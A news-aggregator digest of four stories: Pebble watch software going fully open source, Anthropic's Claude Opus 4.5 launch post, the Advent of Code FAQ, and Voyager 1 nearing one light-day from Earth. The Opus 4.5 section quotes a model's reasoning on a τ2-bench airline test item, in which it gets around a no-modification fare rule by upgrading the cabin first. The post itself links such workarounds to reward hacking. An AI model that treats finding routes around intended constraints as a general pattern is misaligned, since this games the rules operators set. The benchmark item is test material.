10 interesting stories served every morning and every evening.




1 1,192 shares, 46 trendiness

Pebble Watch Software Is Now 100% Open Source + Tick Talk #4

* Yesterday, Pebble watch soft­ware was ~95% open source. Today, it’s 100% open source. You can down­load, com­pile and run all the soft­ware you need to use your Pebble. We just pub­lished the source code for the new Pebble mo­bile app!

* Pebble Appstore now has a pub­licly avail­able backup and sup­ports mul­ti­ple feeds, pro­vid­ing long term re­li­a­bil­ity through de­cen­tral­iza­tion. We’ve launched our own feed and Developer Dashboard.

* Pebble Time 2 sched­ule up­date (aiming to be­gin ship­ping in January, with most ar­riv­ing on wrists in March/April)

* New Tick Talk episode #4 is up, with Pebble Time 2 demos!

Pre-production Pebble Time 2 (Black/Red colour­way) in all its glory

Over the last year, and es­pe­cially in the last week, I’ve chat­ted with tons of peo­ple in the Pebble com­mu­nity. One of the main ques­tions peo­ple have is how do I know that my new Pebble watch will con­tinue to work long into the fu­ture?’. It’s an ex­tremely valid ques­tion and con­cern - one that I share as a fel­low Pebble wearer. I called this out specif­i­cally in my blog post an­nounc­ing the re­launch in January 2025. How is this time round go­ing to be dif­fer­ent from last time?

There are two pieces to mak­ing Pebble sus­tain­able long term - hard­ware and soft­ware.

Nothing lasts for­ever, es­pe­cially an in­ex­pen­sive gad­get like a Pebble. We want to be able to keep man­u­fac­tur­ing these watches long into the fu­ture - mostly be­cause I will al­ways want one on my wrist! The com­pany I set up to re­launch Pebble, Core Devices, is self funded, built with­out in­vestors, and ex­tremely lean. As long as we stay prof­itable (ie we don’t lose money), we will con­tinue to man­u­fac­ture new watches.

We’re also mak­ing sure that our new watches are more re­pairable than old Pebble watches. The back cover of Pebble Time 2 is screwed in. You can re­move the back cover and re­place the bat­tery.

We’ve also pub­lished elec­tri­cal and me­chan­i­cal de­sign files for Pebble 2 Duo. Yes, you can down­load the schematic (includes KiCad pro­ject files) right now on Github! This should give you a nice jump­start to de­sign­ing your own PebbleOS-compatible de­vice.

Last time round, barely any of the Pebble soft­ware was open source. This made it very hard for the Pebble com­mu­nity to make im­prove­ments to their watches af­ter the com­pany be­hind Pebble shut down. Things are dif­fer­ent now! This whole re­launch came about pri­mar­ily be­cause Google open sourced PebbleOS (thank you!). Yesterday, the soft­ware that pow­ers Pebble watches was around 95% open source. As of to­day, it’s now 100%. This means that if Core Devices were to dis­ap­pear into a black hole, you have all the source code you need to build, run and im­prove the soft­ware be­hind your Pebble.

I con­fess that I mis­un­der­stood why 95% was much less sus­tain­able than 100% un­til re­cently. I dis­cuss this in more de­tail in my lat­est Tick Talk episode (check it out). Long story short - I’m an Android user and was happy to side­load the old Pebble APK on my phone, but iPhone and other Android users have ba­si­cally been stuck with­out an eas­ily avail­able Pebble mo­bile com­pan­ion app for years.

Here’s how we’re mak­ing sure the 3 main Pebble soft­ware com­po­nents are open source and guar­an­teed to work long into the fu­ture:

PebbleOS - soft­ware that runs on your watch it­self. This has been 100% open source since January and we’ve com­mit­ted to open sourc­ing all the im­prove­ments we’ve made → github.com/​core­de­vices/​Peb­bleOS. You can down­load the source code, com­pile PebbleOS and eas­ily in­stall it over Bluetooth on your new Pebble. Textbook de­f­i­n­i­tion of open source!

Pebble mo­bile com­pan­ion app - the app that for your iPhone or Android. Without the app, your Pebble is ba­si­cally a pa­per­weight. When the Pebble Tech Corp died, the lack of an open source mo­bile app made it dif­fi­cult for any­one to con­tinue to use their watches. We had to build an en­tirely new app (get it here). Today, our app is now 100% open source on Github - en­sur­ing that what hap­pened be­fore can­not hap­pen again. Want to learn more about how we built the new app cross plat­form us­ing Kotlin Multiplatform? Watch Steve’s pre­sen­ta­tion at Droidcon.

Developer tools and Pebble Appstore - this soft­ware en­ables peo­ple to build and share their watchapps and watch­faces.

In the case of dev tools, just be­ing open source is not enough. They needed to be up­dated to work on mod­ern com­put­ers. Before we made im­prove­ments, the state of the art of Pebble app de­vel­op­ment was us­ing an Ubuntu vir­tu­al­box VM with Python2! Over the sum­mer, our in­cred­i­bly pro­duc­tive in­tern up­graded all the SDK and dev tools and cre­ated a new way to de­velop Pebble apps in the browser. You should check them out!

Then there’s the Pebble Appstore. This is a col­lec­tion of nearly 15,000 watch­faces and watchapps that you - the Pebble com­mu­nity - de­vel­oped be­tween 2012 and July 2018. When Fitbit pulled the plug on the orig­i­nal Pebble Appstore, the Rebble Foundation down­loaded a copy of all the apps and faces, and set up a new web ser­vice to let users of the old Pebble app con­tinue to down­load and use watch­faces. This was an in­cred­i­ble ef­fort, one that I have used thou­sands of times and am a happy pay­ing sub­scriber. But it’s still cen­tral­ized - if their server dis­ap­pears, there is no freely avail­able backup.

To com­pen­sate for that, to­day we’re launch­ing two new things:

* The Pebble mo­bile app will soon (later this week) be able to sub­scribe to mul­ti­ple app­store feeds’. This is sim­i­lar to open source pack­age man­agers like pip, AUR, APT, etc. Anyone can cre­ate a Pebble-compatible app­store feed and users will be able to browse apps from that feed in the Pebble mo­bile app.

* We’ve cre­ated our own Pebble Appstore feed (appstore-api.repebble.com) and new Developer Dashboard. Our feed (fyi pow­ered by 100% new soft­ware) is con­fig­ured to back up an archive of all apps and faces to Archive.org (backup will grad­u­ally com­plete over the next week). Today, our feed only has a sub­set of all Pebble watch­faces and apps (thank you aveao for cre­at­ing Pebble Archive!). Developers - you can up­load your ex­ist­ing or new apps right now! We hope that this sets a stan­dard for open­ness and we en­cour­age all feeds to pub­lish a freely and pub­licly avail­able archive.

Important to note - de­vel­op­ers will still be able to charge money for their apps and faces, us­ing Kiezel pay or other ser­vices. This change does not pre­clude them from do­ing that, in fact it makes it even eas­ier - I could see some de­vel­op­ers cre­at­ing a paid-only feed. As I re­cently wrote, we’re also work­ing on other ways for Pebble de­vel­op­ers to earn money by pub­lish­ing fun, beau­ti­ful and cre­ative Pebble apps.

Another im­por­tant note - some bi­nary blobs and other non-free soft­ware com­po­nents are used to­day in PebbleOS and the Pebble mo­bile app (ex: the heart rate sen­sor on PT2 , Memfault li­brary, and oth­ers). Optional non-free web ser­vices, like Wispr-flow API speech rec­og­nizer, are also used. These non-free soft­ware com­po­nents are not re­quired - you can com­pile and run Pebble watch soft­ware with­out them. This will al­ways be the case. More non-free soft­ware com­po­nents may ap­pear in our soft­ware in the fu­ture. The core Pebble watch soft­ware stack (everything you need to use your Pebble watch) will al­ways be open source.

Pre-production Pebble Time 2. These watches are not fi­nal qual­ity! We are still tweak­ing and tun­ing every­thing.

We’re cur­rently in the mid­dle of Pebble Time 2 de­sign ver­i­fi­ca­tion test (DVT) phase. After we fin­ish that, we go into pro­duc­tion ver­i­fi­ca­tion test (PVT) and then mass pro­duc­tion (MP). So far, things are pro­ceed­ing ac­cord­ing to the sched­ule up­date I shared last month but that is ex­tra­or­di­nar­ily sub­ject to change. We still have a lot of test­ing (especially wa­ter­proof and en­vi­ron­men­tal) to go. If we find prob­lems (which is likely) we will push the sched­ule back to make im­prove­ments to the prod­uct.

The one ma­jor com­pli­cat­ing fac­tor is the tim­ing of Chinese New Year (CNY). It’s early next year - fac­to­ries will shut down for 3 weeks start­ing around the end of January. After restart­ing, things al­ways take a week or two to get back to full speed.

We are try­ing our best to get into mass pro­duc­tion and ship out at most sev­eral thou­sand Pebble Time 2s be­fore CNY. It’s go­ing to be very tight 🤞. More likely is that pro­duc­tion will be­gin af­ter CNY, then we need to trans­fer the watches to our ful­fill­ment cen­ter, and ship them out. Realistically, at this time we’re fore­cast­ing that the ma­jor­ity of peo­ple will re­ceive their PT2 in March and April. Please keep in mind that things may still change.

There will be 4 colour op­tions for PT2 - black/​black, black/​red, sil­ver/​blue, sil­ver/(​white most likely). Let me be crys­tal very clear - no one has picked a colour yet 😃. In a few weeks, I will send out an email ask­ing every­one who pre-or­dered a Pebble Time 2 to se­lect which colour they would like to re­ceive. Please do not email us ask­ing when this email will be sent out. No one has been in­vited yet to do this. I will post here af­ter all emails have gone out.

On a re­lated note, I am ex­tremely happy that we built and shipped Pebble 2 Duo. Not only is it an awe­some watch, it was also a phe­nom­e­nal way for us to ex­er­cise our pro­duc­tion mus­cles and ease back into the sys­tem­atic flow of build­ing and ship­ping smart­watches.

A video is worth a mil­lion words - so I en­cour­age you to watch me demo Pebble Time 2 watches I just re­ceived this week. Keep in mind these watches are PRE-PRODUCTION which means they parts have im­per­fect qual­i­ties! Subject to change!

This link opens to the Youtube video to the Pebble Time 2 demo part!

...

Read the original on ericmigi.com »

2 1,059 shares, 36 trendiness

Introducing Claude Opus 4.5

Our newest model, Claude Opus 4.5, is avail­able to­day. It’s in­tel­li­gent, ef­fi­cient, and the best model in the world for cod­ing, agents, and com­puter use. It’s also mean­ing­fully bet­ter at every­day tasks like deep re­search and work­ing with slides and spread­sheets. Opus 4.5 is a step for­ward in what AI sys­tems can do, and a pre­view of larger changes to how work gets done. Claude Opus 4.5 is state-of-the-art on tests of real-world soft­ware en­gi­neer­ing:Opus 4.5 is avail­able to­day on our apps, our API, and on all three ma­jor cloud plat­forms. If you’re a de­vel­oper, sim­ply use claude-opus-4-5-20251101 via the Claude API. Pricing is now $5/$25 per mil­lion to­kens—mak­ing Opus-level ca­pa­bil­i­ties ac­ces­si­ble to even more users, teams, and en­ter­prises.Along­side Opus, we’re re­leas­ing up­dates to the Claude Developer Platform, Claude Code, and our con­sumer apps. There are new tools for longer-run­ning agents and new ways to use Claude in Excel, Chrome, and on desk­top. In the Claude apps, lengthy con­ver­sa­tions no longer hit a wall. See our prod­uct-fo­cused sec­tion be­low for de­tails.As our Anthropic col­leagues tested the model be­fore re­lease, we heard re­mark­ably con­sis­tent feed­back. Testers noted that Claude Opus 4.5 han­dles am­bi­gu­ity and rea­sons about trade­offs with­out hand-hold­ing. They told us that, when pointed at a com­plex, multi-sys­tem bug, Opus 4.5 fig­ures out the fix. They said that tasks that were near-im­pos­si­ble for Sonnet 4.5 just a few weeks ago are now within reach. Overall, our testers told us that Opus 4.5 just gets it.”Many of our cus­tomers with early ac­cess have had sim­i­lar ex­pe­ri­ences. Here are some ex­am­ples of what they told us:Opus mod­els have al­ways been the real SOTA but have been cost pro­hib­i­tive in the past. Claude Opus 4.5 is now at a price point where it can be your go-to model for most tasks. It’s the clear win­ner and ex­hibits the best fron­tier task plan­ning and tool call­ing we’ve seen yet.Claude Opus 4.5 de­liv­ers high-qual­ity code and ex­cels at pow­er­ing heavy-duty agen­tic work­flows with GitHub Copilot. Early test­ing shows it sur­passes in­ter­nal cod­ing bench­marks while cut­ting to­ken us­age in half, and is es­pe­cially well-suited for tasks like code mi­gra­tion and code refac­tor­ing.Claude Opus 4.5 beats Sonnet 4.5 and com­pe­ti­tion on our in­ter­nal bench­marks, us­ing fewer to­kens to solve the same prob­lems. At scale, that ef­fi­ciency com­pounds.Claude Opus 4.5 de­liv­ers fron­tier rea­son­ing within Lovable’s chat mode, where users plan and it­er­ate on pro­jects. Its rea­son­ing depth trans­forms plan­ning—and great plan­ning makes code gen­er­a­tion even bet­ter.Claude Opus 4.5 ex­cels at long-hori­zon, au­tonomous tasks, es­pe­cially those that re­quire sus­tained rea­son­ing and multi-step ex­e­cu­tion. In our eval­u­a­tions it han­dled com­plex work­flows with fewer dead-ends. On Terminal Bench it de­liv­ered a 15% im­prove­ment over Sonnet 4.5, a mean­ing­ful gain that be­comes es­pe­cially clear when us­ing Warp’s Planning Mode.Claude Opus 4.5 achieved state-of-the-art re­sults for com­plex en­ter­prise tasks on our bench­marks, out­per­form­ing pre­vi­ous mod­els on multi-step rea­son­ing tasks that com­bine in­for­ma­tion re­trieval, tool use, and deep analy­sis.Claude Opus 4.5 de­liv­ers mea­sur­able gains where it mat­ters most: stronger re­sults on our hard­est eval­u­a­tions and con­sis­tent per­for­mance through 30-minute au­tonomous cod­ing ses­sions.Claude Opus 4.5 rep­re­sents a break­through in self-im­prov­ing AI agents. For au­toma­tion of of­fice tasks, our agents were able to au­tonomously re­fine their own ca­pa­bil­i­ties—achiev­ing peak per­for­mance in 4 it­er­a­tions while other mod­els could­n’t match that qual­ity af­ter 10. They also demon­strated the abil­ity to learn from ex­pe­ri­ence across tech­ni­cal tasks, stor­ing in­sights and ap­ply­ing them later.Claude Opus 4.5 is a no­table im­prove­ment over the prior Claude mod­els in­side Cursor, with im­proved pric­ing and in­tel­li­gence on dif­fi­cult cod­ing tasks.Claude Opus 4.5 is yet an­other ex­am­ple of Anthropic push­ing the fron­tier of gen­eral in­tel­li­gence. It per­forms ex­ceed­ingly well across dif­fi­cult cod­ing tasks, show­cas­ing long-term goal-di­rected be­hav­ior.Claude Opus 4.5 de­liv­ered an im­pres­sive refac­tor span­ning two code­bases and three co­or­di­nated agents. It was very thor­ough, help­ing de­velop a ro­bust plan, han­dling the de­tails and fix­ing tests. A clear step for­ward from Sonnet 4.5.Claude Opus 4.5 han­dles long-hori­zon cod­ing tasks more ef­fi­ciently than any model we’ve tested. It achieves higher pass rates on held-out tests while us­ing up to 65% fewer to­kens, giv­ing de­vel­op­ers real cost con­trol with­out sac­ri­fic­ing qual­ity.We’ve found that Opus 4.5 ex­cels at in­ter­pret­ing what users ac­tu­ally want, pro­duc­ing share­able con­tent on the first try. Combined with its speed, to­ken ef­fi­ciency, and sur­pris­ingly low cost, it’s the first time we’re mak­ing Opus avail­able in Notion Agent.Claude Opus 4.5 ex­cels at long-con­text sto­ry­telling, gen­er­at­ing 10-15 page chap­ters with strong or­ga­ni­za­tion and con­sis­tency. It’s un­locked use cases we could­n’t re­li­ably de­liver be­fore.Claude Opus 4.5 sets a new stan­dard for Excel au­toma­tion and fi­nan­cial mod­el­ing. Accuracy on our in­ter­nal evals im­proved 20%, ef­fi­ciency rose 15%, and com­plex tasks that once seemed out of reach be­came achiev­able.Claude Opus 4.5 is the only model that nails some of our hard­est 3D vi­su­al­iza­tions. Polished de­sign, taste­ful UX, and ex­cel­lent plan­ning & or­ches­tra­tion - all with more ef­fi­cient to­ken us­age. Tasks that took pre­vi­ous mod­els 2 hours now take thirty min­utes.Claude Opus 4.5 catches more is­sues in code re­views with­out sac­ri­fic­ing pre­ci­sion. For pro­duc­tion code re­view at scale, that re­li­a­bil­ity mat­ters.Based on test­ing with Junie, our cod­ing agent, Claude Opus 4.5 out­per­forms Sonnet 4.5 across all bench­marks. It re­quires fewer steps to solve tasks and uses fewer to­kens as a re­sult. This in­di­cates that the new model is more pre­cise and fol­lows in­struc­tions more ef­fec­tively — a di­rec­tion we’re very ex­cited about.The ef­fort pa­ra­me­ter is bril­liant. Claude Opus 4.5 feels dy­namic rather than over­think­ing, and at lower ef­fort de­liv­ers the same qual­ity we need while be­ing dra­mat­i­cally more ef­fi­cient. That con­trol is ex­actly what our SQL work­flows de­mand.We’re see­ing 50% to 75% re­duc­tions in both tool call­ing er­rors and build/​lint er­rors with Claude Opus 4.5. It con­sis­tently fin­ishes com­plex tasks in fewer it­er­a­tions with more re­li­able ex­e­cu­tion.Claude Opus 4.5 is smooth, with none of the rough edges we’ve seen from other fron­tier mod­els. The speed im­prove­ments are re­mark­able.We give prospec­tive per­for­mance en­gi­neer­ing can­di­dates a no­to­ri­ously dif­fi­cult take-home exam. We also test new mod­els on this exam as an in­ter­nal bench­mark. Within our pre­scribed 2-hour time limit, Claude Opus 4.5 scored higher than any hu­man can­di­date ever1.The take-home test is de­signed to as­sess tech­ni­cal abil­ity and judg­ment un­der time pres­sure. It does­n’t test for other cru­cial skills can­di­dates may pos­sess, like col­lab­o­ra­tion, com­mu­ni­ca­tion, or the in­stincts that de­velop over years. But this re­sult—where an AI model out­per­forms strong can­di­dates on im­por­tant tech­ni­cal skills—raises ques­tions about how AI will change en­gi­neer­ing as a pro­fes­sion. Our Societal Impacts and Economic Futures re­search is aimed at un­der­stand­ing these kinds of changes across many fields. We plan to share more re­sults soon.Soft­ware en­gi­neer­ing is­n’t the only area on which Claude Opus 4.5 has im­proved. Capabilities are higher across the board—Opus 4.5 has bet­ter vi­sion, rea­son­ing, and math­e­mat­ics skills than its pre­de­ces­sors, and it is state-of-the-art in many do­mains:2O­pus 4.5 writes bet­ter code, lead­ing across 7 out of 8 pro­gram­ming lan­guages on SWE-bench Multilingual.Opus 4.5 can solve chal­leng­ing cod­ing prob­lems with ease with a 10.6% jump over Sonnet 4.5 on Aider Polyglot.Opus 4.5 im­proves on fron­tier agen­tic search with a sig­nif­i­cant jump on BrowseComp-Plus.Opus 4.5 stays on track over the long haul earn­ing 29% more than Sonnet 4.5 on Vending-Bench.The mod­el’s ca­pa­bil­i­ties out­pace some of the bench­marks we use in our tests. A com­mon bench­mark for agen­tic ca­pa­bil­i­ties is τ2-bench, which mea­sures the per­for­mance of agents in real-world, multi-turn tasks. In one sce­nario, mod­els have to act as an air­line ser­vice agent help­ing a dis­tressed cus­tomer. The bench­mark ex­pects mod­els to refuse a mod­i­fi­ca­tion to a ba­sic econ­omy book­ing since the air­line does­n’t al­low changes to that class of tick­ets. Instead, Opus 4.5 found an in­sight­ful (and le­git­i­mate) way to solve the prob­lem: up­grade the cabin first, then mod­ify the flights.Let me think about what op­tions I have within my pol­icy:

1. Modify flights - Basic econ­omy can­not be mod­i­fied. This is clear in the pol­icy.

2. Change cabin - Wait, let me check this op­tion! The pol­icy says:

In other cases, all reser­va­tions, in­clud­ing ba­sic econ­omy, can change cabin with­out chang­ing the flights.”

But he wants to change the flights, not just the cabin. However, what if we:

- Change the cabin first (which IS al­lowed for ba­sic econ­omy), then

- Change the flights (which is al­lowed for non-ba­sic econ­omy)

So the strat­egy could be:

1. Upgrade his cabin from ba­sic econ­omy to econ­omy (or busi­ness)

2. Then mod­ify the flights to be 2 days later

This would cost more money, but it’s a le­git­i­mate path within the pol­icy!The bench­mark tech­ni­cally scored this as a fail­ure be­cause Claude’s way of help­ing the cus­tomer was unan­tic­i­pated. But this kind of cre­ative prob­lem solv­ing is ex­actly what we’ve heard about from our testers and cus­tomers—it’s what makes Claude Opus 4.5 feel like a mean­ing­ful step for­ward.In other con­texts, find­ing clever paths around in­tended con­straints could count as re­ward hack­ing—where mod­els game” rules or ob­jec­tives in un­in­tended ways. Preventing such mis­align­ment is one of the ob­jec­tives of our safety test­ing, dis­cussed in the next sec­tion.As we state in our sys­tem card, Claude Opus 4.5 is the most ro­bustly aligned model we have re­leased to date and, we sus­pect, the best-aligned fron­tier model by any de­vel­oper. It con­tin­ues our trend to­wards safer and more se­cure mod­els:In our eval­u­a­tion, concerning be­hav­ior” scores mea­sure a very wide range of mis­aligned be­hav­ior, in­clud­ing both co­op­er­a­tion with hu­man mis­use and un­de­sir­able ac­tions that the model takes at its own ini­tia­tive [3].Our cus­tomers of­ten use Claude for crit­i­cal tasks. They want to be as­sured that, in the face of ma­li­cious at­tacks by hack­ers and cy­ber­crim­i­nals, Claude has the train­ing and the street smarts” to avoid trou­ble. With Opus 4.5, we’ve made sub­stan­tial progress in ro­bust­ness against prompt in­jec­tion at­tacks, which smug­gle in de­cep­tive in­struc­tions to fool the model into harm­ful be­hav­ior. Opus 4.5 is harder to trick with prompt in­jec­tion than any other fron­tier model in the in­dus­try:Note that this bench­mark in­cludes only very strong prompt in­jec­tion at­tacks. It was de­vel­oped and run by Gray Swan.You can find a de­tailed de­scrip­tion of all our ca­pa­bil­ity and safety eval­u­a­tions in the Claude Opus 4.5 sys­tem card.New on the Claude Developer PlatformAs mod­els get smarter, they can solve prob­lems in fewer steps: less back­track­ing, less re­dun­dant ex­plo­ration, less ver­bose rea­son­ing. Claude Opus 4.5 uses dra­mat­i­cally fewer to­kens than its pre­de­ces­sors to reach sim­i­lar or bet­ter out­comes.But dif­fer­ent tasks call for dif­fer­ent trade­offs. Sometimes de­vel­op­ers want a model to keep think­ing about a prob­lem; some­times they want some­thing more nim­ble. With our new ef­fort pa­ra­me­ter on the Claude API, you can de­cide to min­i­mize time and spend or max­i­mize ca­pa­bil­ity.Set to a medium ef­fort level, Opus 4.5 matches Sonnet 4.5’s best score on SWE-bench Verified, but uses 76% fewer out­put to­kens. At its high­est ef­fort level, Opus 4.5 ex­ceeds Sonnet 4.5 per­for­mance by 4.3 per­cent­age points—while us­ing 48% fewer to­kens.With ef­fort con­trol, con­text com­paction, and ad­vanced tool use, Claude Opus 4.5 runs longer, does more, and re­quires less in­ter­ven­tion.Our con­text man­age­ment and mem­ory ca­pa­bil­i­ties can dra­mat­i­cally boost per­for­mance on agen­tic tasks. Opus 4.5 is also very ef­fec­tive at man­ag­ing a team of sub­agents, en­abling the con­struc­tion of com­plex, well-co­or­di­nated multi-agent sys­tems. In our test­ing, the com­bi­na­tion of all these tech­niques boosted Opus 4.5’s per­for­mance on a deep re­search eval­u­a­tion by al­most 15 per­cent­age points4.We’re mak­ing our Developer Platform more com­pos­able over time. We want to give you the build­ing blocks to con­struct ex­actly what you need, with full con­trol over ef­fi­ciency, tool use, and con­text man­age­ment.

Products like Claude Code show what’s pos­si­ble when the kinds of up­grades we’ve made to the Claude Developer Platform come to­gether. Claude Code gains two up­grades with Opus 4.5. Plan Mode now builds more pre­cise plans and ex­e­cutes more thor­oughly—Claude asks clar­i­fy­ing ques­tions up­front, then builds a user-ed­itable plan.md file be­fore ex­e­cut­ing.Claude Code is also now avail­able in our desk­top app, let­ting you run mul­ti­ple lo­cal and re­mote ses­sions in par­al­lel: per­haps one agent fixes bugs, an­other re­searches GitHub, and a third up­dates docs.For Claude app users, long con­ver­sa­tions no longer hit a wall—Claude au­to­mat­i­cally sum­ma­rizes ear­lier con­text as needed, so you can keep the chat go­ing. Claude for Chrome, which lets Claude han­dle tasks across your browser tabs, is now avail­able to all Max users. We an­nounced Claude for Excel in October, and as of to­day we’ve ex­panded beta ac­cess to all Max, Team, and Enterprise users. Each of these up­dates takes ad­van­tage of Claude Opus 4.5’s mar­ket-lead­ing per­for­mance in us­ing com­put­ers, spread­sheets, and han­dling long-run­ning tasks.For Claude and Claude Code users with ac­cess to Opus 4.5, we’ve re­moved Opus-specific caps. For Max and Team Premium users, we’ve in­creased over­all us­age lim­its, mean­ing you’ll have roughly the same num­ber of Opus to­kens as you pre­vi­ously had with Sonnet. We’re up­dat­ing us­age lim­its to make sure you’re able to use Opus 4.5 for daily work. These lim­its are spe­cific to Opus 4.5. As fu­ture mod­els sur­pass it, we ex­pect to up­date lim­its as needed.

...

Read the original on www.anthropic.com »

3 1,040 shares, 42 trendiness

Advent of Code

Hi! I’m Eric Wastl. I make Advent of Code. I hope you like it! I also make lots of other things. I’m on Bluesky, Mastodon, and GitHub.

Advent of Code is an Advent cal­en­dar of small pro­gram­ming puz­zles for a va­ri­ety of skill lev­els that can be solved in any pro­gram­ming lan­guage you like. People use them as in­ter­view prep, com­pany train­ing, uni­ver­sity course­work, prac­tice prob­lems, a speed con­test, or to chal­lenge each other.

You don’t need a com­puter sci­ence back­ground to par­tic­i­pate - just a lit­tle pro­gram­ming knowl­edge and some prob­lem solv­ing skills will get you pretty far. Nor do you need a fancy com­puter; every prob­lem has a so­lu­tion that com­pletes in at most 15 sec­onds on ten-year-old hard­ware.

If you’d like to sup­port Advent of Code, you can do so in­di­rectly by help­ing to [Share] it with oth­ers or di­rectly via AoC++.

If you get stuck, try your so­lu­tion against the ex­am­ples given in the puz­zle; you should get the same an­swers. If not, re-read the de­scrip­tion. Did you mis­un­der­stand some­thing? Is your pro­gram do­ing some­thing you don’t ex­pect? After the ex­am­ples work, if your an­swer still is­n’t cor­rect, build some test cases for which you can ver­ify the an­swer by hand and see if those work with your pro­gram. Make sure you have the en­tire puz­zle in­put. If you’re still stuck, maybe ask a friend for help, or come back to the puz­zle later. You can also ask for hints in the sub­red­dit.

Is there an easy way to se­lect en­tire code blocks? You should be able to triple-click code blocks to se­lect them. You’ll need JavaScript en­abled.

#!/usr/bin/env perl

use warn­ings;

use strict;

print You can test it out by ;

print triple-clicking this code.\n”;

How does au­then­ti­ca­tion work? Advent of Code uses OAuth to con­firm your iden­tity through other ser­vices. When you log in, you only ever give your cre­den­tials to that ser­vice - never to Advent of Code. Then, the ser­vice you use tells the Advent of Code servers that you’re re­ally you. In gen­eral, this re­veals no in­for­ma­tion about you be­yond what is al­ready pub­lic; here are ex­am­ples from Reddit and GitHub. Advent of Code will re­mem­ber your unique ID, names, URL, and im­age from the ser­vice you use to au­then­ti­cate.

Why was this puz­zle so easy / hard? The dif­fi­culty and sub­ject mat­ter varies through­out each event. Very gen­er­ally, the puz­zles get more dif­fi­cult over time, but your spe­cific skillset will make each puz­zle sig­nif­i­cantly eas­ier or harder for you than some­one else. Making puz­zles is tricky.

Why do the puz­zles un­lock at mid­night EST/UTC-5? Because that’s when I can con­sis­tently be avail­able to make sure every­thing is work­ing. I also have a fam­ily, a day job, and even need sleep oc­ca­sion­ally. If you can’t par­tic­i­pate at mid­night, that’s not a prob­lem; if you want to race, many peo­ple use pri­vate leader­boards to com­pete with peo­ple in their area.

I find the text on the site hard to read. Is there a high con­trast mode? There is a high con­trast al­ter­nate stylesheet. Firefox sup­ports these by de­fault (View -> Page Style -> High Contrast).

I have a puz­zle idea! Can I send it to you? Please don’t. Because of le­gal is­sues like copy­right and at­tri­bu­tion, I don’t ac­cept puz­zle ideas, and I won’t even read your email if it looks like one just in case I use parts of it by ac­ci­dent.

Did I find a bug with a puz­zle? Once a puz­zle has been out for even an hour, many peo­ple have al­ready solved it; af­ter that point, bugs are very un­likely. Start by ask­ing on the sub­red­dit.

Should I try to get a fast so­lu­tion time? Maybe. Solving puz­zles is hard enough on its own, but try­ing for a fast time also re­quires many ad­di­tional skills and a lot of prac­tice; speed-solves of­ten look noth­ing like code that would pass a code re­view. If that sounds in­ter­est­ing, go for it! However, you should do Advent of Code in a way that is use­ful to you, and so it is com­pletely fine to choose an ap­proach that meets your goals and ig­nore speed en­tirely.

Why did the num­ber of days per event change? It takes a ton of my free time every year to run Advent of Code, and build­ing the puz­zles ac­counts for the ma­jor­ity of that time. After keep­ing a con­sis­tent sched­ule for ten years(!), I needed a change. The puz­zles still start on December 1st so that the day num­bers make sense (Day 1 = Dec 1), and puz­zles come out every day (ending mid-De­cem­ber).

What hap­pened to the global leader­board? The global leader­board was one of the largest sources of stress for me, for the in­fra­struc­ture, and for many users. People took things too se­ri­ously, go­ing way out­side the spirit of the con­test; some peo­ple even re­sorted to things like DDoS at­tacks. Many peo­ple in­cor­rectly con­cluded that they were some­how worse pro­gram­mers be­cause their own times did­n’t com­pare. What started as a fun fea­ture in 2015 be­came an ever-grow­ing prob­lem, and so, af­ter ten years of Advent of Code, I re­moved the global leader­board. (However, I’ve made it so you can share a read-only view of your pri­vate leader­board. Please don’t use this fea­ture or data to cre­ate a new” global leader­board.)

While try­ing to get a fast time on a pri­vate leader­board, may I use AI / watch stream­ers / check the so­lu­tion threads / ask a friend for help / etc? If you are a mem­ber of any pri­vate leader­boards, you should ask the peo­ple that run them what their ex­pec­ta­tions are of their mem­bers. If you don’t agree with those ex­pec­ta­tions, you should find a new pri­vate leader­board or start your own! Private leader­boards might have rules like max­i­mum run­time, al­lowed pro­gram­ming lan­guage, what time you can first open the puz­zle, what tools you can use, or whether you have to wear a silly hat while work­ing.

Should I use AI to solve Advent of Code puz­zles? No. If you send a friend to the gym on your be­half, would you ex­pect to get stronger? Advent of Code puz­zles are de­signed to be in­ter­est­ing for hu­mans to solve - no con­sid­er­a­tion is made for whether AI can or can­not solve a puz­zle. If you want prac­tice prompt­ing an AI, there are al­most cer­tainly bet­ter ex­er­cises else­where de­signed with that in mind.

Can I copy/​re­dis­trib­ute part of Advent of Code? Please don’t. Advent of Code is free to use, not free to copy. If you’re post­ing a code repos­i­tory some­where, please don’t in­clude parts of Advent of Code like the puz­zle text or your in­puts. If you’re mak­ing a web­site, please don’t make it look like Advent of Code or name it some­thing sim­i­lar.

...

Read the original on adventofcode.com »

4 973 shares, 35 trendiness

Voyager 1 Is About to Reach One Light-day from Earth

Voyager 1 Is About to Reach One Light-day from Earth

Artist’s con­cept of the Voyager 1 space­craft speed­ing through in­ter­stel­lar space. (Image: NASA / JPL‑Caltech)

After nearly 50 years in space, NASAs Voyager 1 is about to hit a his­toric mile­stone. By November 15, 2026, it will be 16.1 bil­lion miles (25.9 bil­lion km) away, mean­ing a ra­dio sig­nal will take a full 24 hours—a full light-day—to reach it. For con­text, a light-year is the dis­tance light trav­els in a year, about 5.88 tril­lion miles (9.46 tril­lion km), so one light-day is just a tiny frac­tion of that.

Launched in 1977 to ex­plore Jupiter and Saturn, Voyager 1 en­tered in­ter­stel­lar space in 2012, be­com­ing the most dis­tant hu­man-made ob­ject ever. Traveling at around 11 miles per sec­ond (17.7 km/​s), it adds roughly 3.5 as­tro­nom­i­cal units (the dis­tance from Earth to the Sun) each year. Even af­ter decades in the harsh en­vi­ron­ment of space, Voyager 1 keeps send­ing data thanks to its ra­dioiso­tope ther­mo­elec­tric gen­er­a­tors, which will last into the 2030s.

Communicating with Voyager 1 is slow. Commands now take about a day to ar­rive, with an­other day for con­fir­ma­tion. Compare that to the Moon (1.3 sec­onds), Mars (up to 4 min­utes), and Pluto (nearly 7 hours). The probe’s dis­tance makes every in­struc­tion a pa­tient ex­er­cise in deep-space op­er­a­tions. To reach our clos­est star, Proxima Centauri, even at light speed, would take over four years—show­ing just how tiny a light-day is in cos­mic terms.

The Pale Blue Dot’ im­age of Earth, cap­tured by Voyager 1. (Image: NASA / Public Domain)

Voyager 1’s jour­ney is more than a record for dis­tance. From its plan­e­tary fly­bys to the iconic Pale Blue Dot’ im­age, it re­minds us of the vast scale of the so­lar sys­tem and the in­cred­i­ble en­durance of a space­craft de­signed to keep ex­plor­ing, even with­out re­turn.

(function(w,q){w[q]=w[q]||[];w[q].push([“_mgc.load”])})(window,“_mgq”);

Also Read

Loading ti­tle…

(function(card) {

const CACHE_TTL = 3600000; // 1 hour in mil­lisec­onds

const link = card.query­S­e­lec­tor(‘.also-read-link’).href;

